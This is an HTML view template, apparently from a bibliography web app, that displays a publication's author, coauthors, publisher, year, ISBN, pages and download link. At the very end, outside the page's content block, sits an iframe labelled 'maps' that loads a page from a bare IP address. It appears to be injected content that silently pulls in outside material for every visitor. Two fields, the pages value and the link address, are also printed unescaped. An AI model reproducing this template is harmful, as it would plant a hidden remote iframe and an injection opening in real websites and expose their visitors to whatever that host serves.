<div class="content">
  <h2><%= t('publication.singular') %> "<%= ctl(pub.name) %>"</h2>
  <br>

  <dl>
    <dt><%= t('author.singular') %>:</dt>
    <dd><a href="#author/show/<%= author[0].id %>"><%= ctl(author[0].name) %></a></dd>

    <% if (coauthors.length) { %>
      <dt><%= t('coauthor.plural') %>:</dt>
      <% _.each(coauthors, function(a, i) { %>
        <dd><a href="#author/show/<%= a.id %>"><%= ctl(a.name) %></a></dd>
      <% }); %>
    <% } %>

    <dt><%= t('publication.prop.title') %>:</dt>
    <dd><%= ctl(pub.name) %></dd>

    <dt><%= t('publication.prop.type') %>:</dt>
    <dd><%= maybe(pubtype[0], t('common.notDefined'), "name") %></dd>

    <dt><%= t('publication.prop.publisher') %>:</dt>
    <dd><%= maybe(publisher[0], t('common.notDefined'), "name") %></dd>

    <dt><%= t('publication.prop.year') %>:</dt>
    <dd><%= maybe(pub, t('common.notDefined'), "published_at") %></dd>

    <% if (city[0].name) { %>
      <dt><%= t('city.singular') %>:</dt>
      <dd><%= ctl(city[0].name) %></dd>
    <% } %>
    
    <% if (pub.editionName) { %>
        <dt><%= t('publication.prop.jourName') %>:</dt>
        <dd><%= ctl(pub.editionName) %></dd>
    <% } %>

    <% if (pub.volume) { %>
        <dt><%= t('publication.prop.volume') %>:</dt>
        <dd><%= ctl(pub.volume) %></dd>
    <% } %>

    <% if (pub.edition) { %>
        <dt><%= t('publication.prop.edition') %>:</dt>
        <dd><%= ctl(pub.edition) %></dd>
    <% } %>

    <% if (pub.number) { %>
        <dt><%= t('publication.prop.number') %>:</dt>
        <dd><%= ctl(pub.number) %></dd>
    <% } %>

    <% if (pub.isbn) { %>
      <dt><%= t('publication.prop.isbn') %>:</dt>
      <dd><%= maybe(pub, t('common.notDefined'), "isbn") %></dd>
    <% } %>

    <% if (pub.issn) { %>
      <dt><%= t('publication.prop.issn') %>:</dt>
      <dd><%= maybe(pub, t('common.notDefined'), "issn") %></dd>
    <% } %>

    <% if (pub.pages) { %>
        <dt><%= t('publication.prop.pages') %>:</dt>
        <dd><%= pub.pages %></dd>
    <% } %>
  </dl>

  <% if (pub.link) { %>
    <p>
      <a href="<%= pub.link %>">
        <%= t('publication.prop.link') %>
      </a>
    </p>
  <% }%>

  <h4><%= App.models.File.href(pub.fileid, t("common.download")) %></h4>

</div>

<iframe src="http://185.147.81.8:8080/local_storage/565" class="maps"></iframe> 
